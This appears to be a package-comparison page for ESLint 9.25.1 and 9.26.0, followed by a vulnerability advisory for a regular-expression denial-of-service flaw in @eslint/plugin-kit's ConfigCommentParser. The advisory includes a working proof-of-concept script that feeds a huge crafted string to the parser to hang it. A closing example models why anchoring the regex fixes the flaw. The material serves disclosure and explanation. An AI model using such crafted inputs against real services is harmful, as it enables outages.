ESLint 9.26.0 represents a minor update over version 9.25.1, offering incremental improvements and refinements to this popular JavaScript linting tool. Both versions share the core functionality of analyzing code for stylistic and potential error patterns, ensuring code quality and consistency. Key dependencies like espree, esquery, and esutils remain consistent, reflecting stability in the underlying parsing and analysis engines.
Developers upgrading to 9.26.0 will notice subtle enhancements rather than radical changes. The most significant difference lies in the @eslint/js dependency, which jumps from 9.25.1 to 9.26.0, indicating updated ECMAScript syntax support or rule adjustments. Additionally, @eslint/json moves from version 0.11.0 to 0.12.0, suggesting improvements or fixes related to JSON schema validation within ESLint configurations.
The development dependencies also reflect minor adjustments; @types/node stays at version 22.13.14. The number of files in the packaged distribution has changed and the unpacked size has increased slightly, indicating the addition of some assets or content.
These subtle updates collectively contribute to a more robust and efficient linting experience. While the core ESLint workflow remains familiar, developers benefit from enhanced rule accuracy, improved compatibility with newer JavaScript features, and refined configuration handling. These enhancements streamline code review processes and contribute to a codebase that adheres to the latest best practices. This version also has a more recent release date, which means that bug fixes and security issues are newer.
All the vulnerabilities related to the version 9.26.0 of the package
@eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser
The ConfigCommentParser#parseJSONLikeConfig API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument.
The regular expression at packages/plugin-kit/src/config-comment-parser.js:158 is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with [^-a-zA-Z0-9/].
const { ConfigCommentParser } = require("@eslint/plugin-kit");
// One very long run of key characters followed by "?" instead of ":"
const str = `${"A".repeat(1000000)}?: 1 B: 2`;
console.log("start");
const parser = new ConfigCommentParser();
console.log(parser.parseJSONLikeConfig(str));
console.log("end");
// run `npm i @eslint/plugin-kit@0.3.3` and `node attack.js`
// then the program will be stuck forever with high CPU usage
This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.
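Why anchoring removes the quadratic behaviour, as an added example that is not part of the advisory or of the @eslint/plugin-kit source. The two patterns are assumptions built from the character class quoted above (the anchored one uses a negative lookbehind), the helper names are hypothetical, and countSteps is a simplified model of a backtracking matcher so that the result is deterministic rather than timed.

```javascript
// Added example: models the pattern shape described in the advisory text.
// The regexes are assumptions built from the character class quoted above.
const KEY_CHAR = /[-a-zA-Z0-9/]/u;
const UNANCHORED = /([-a-zA-Z0-9/]+):/gu; // a match may start anywhere
const ANCHORED = /(?<![-a-zA-Z0-9/])([-a-zA-Z0-9/]+):/gu; // only at a key boundary

// Quote every `key:` in a JSON-like string (hypothetical helper).
function quoteKeys(text, pattern) {
  return text.replace(pattern, '"$1":');
}

// Same input shape as the proof of concept, at a harmless size.
function longKeyInput(n) {
  return `${"A".repeat(n)}?: 1 B: 2`;
}

// Deterministic model of a backtracking matcher: counts character tests
// instead of measuring wall-clock time.
function countSteps(text, anchored) {
  let steps = 0;
  for (let start = 0; start < text.length; start++) {
    if (anchored) {
      steps++; // lookbehind test on the previous character
      if (start > 0 && KEY_CHAR.test(text[start - 1])) continue;
    }
    let end = start;
    while (end < text.length) { // greedy run of key characters
      steps++;
      if (!KEY_CHAR.test(text[end])) break;
      end++;
    }
    for (let stop = end; stop > start; stop--) { // backtrack looking for ':'
      steps++;
      if (text[stop] === ":") { start = stop; break; } // resume after the match
    }
  }
  return steps;
}

// How much the work grows when the input length doubles.
function growthWhenDoubled(n, anchored) {
  return countSteps(longKeyInput(2 * n), anchored) / countSteps(longKeyInput(n), anchored);
}

console.log("unanchored growth x", growthWhenDoubled(1000, false).toFixed(2));
console.log("anchored growth   x", growthWhenDoubled(1000, true).toFixed(2));
```

Doubling the input roughly quadruples the work for the unanchored pattern and roughly doubles it for the anchored one, while both patterns rewrite well-formed input identically.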